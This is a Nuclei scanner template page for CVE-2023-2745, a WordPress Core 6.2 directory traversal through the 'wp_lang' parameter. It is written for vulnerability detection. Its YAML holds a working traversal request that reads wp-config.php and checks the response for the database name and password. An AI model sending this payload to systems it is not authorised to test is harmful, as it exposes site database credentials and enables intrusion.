Skip to content
Nuclei Templates

WordPress Core <=6.2 - Directory Traversal

ID: CVE-2023-2745

Severity: medium

Author: nqdung2002

Tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi

Description

Section titled “Description”

WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2023-2745


info:
  name: WordPress Core <=6.2 - Directory Traversal
  author: nqdung2002
  severity: medium
  description: |
    WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter.
  impact: |
    This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2745
    - https://www.cvedetails.com/cve/CVE-2023-2745/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-22
  metadata:
    max-request: 3
    framework: wordpress
  tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins")'
        internal: true


  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1


      - |
        GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_2, "DB_NAME", "DB_PASSWORD")'
          - 'status_code_2 == 200'
        condition: and
# digest: 490a004630440220107e737c8e906baa023aae8092fed9a185e86cbd18d9b854fd2a84800af37515022055a004dbc8d2f928369519be1e2c1e47c6da1832c8a36a944556f6e91eabb232:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2745.yaml"

View on Github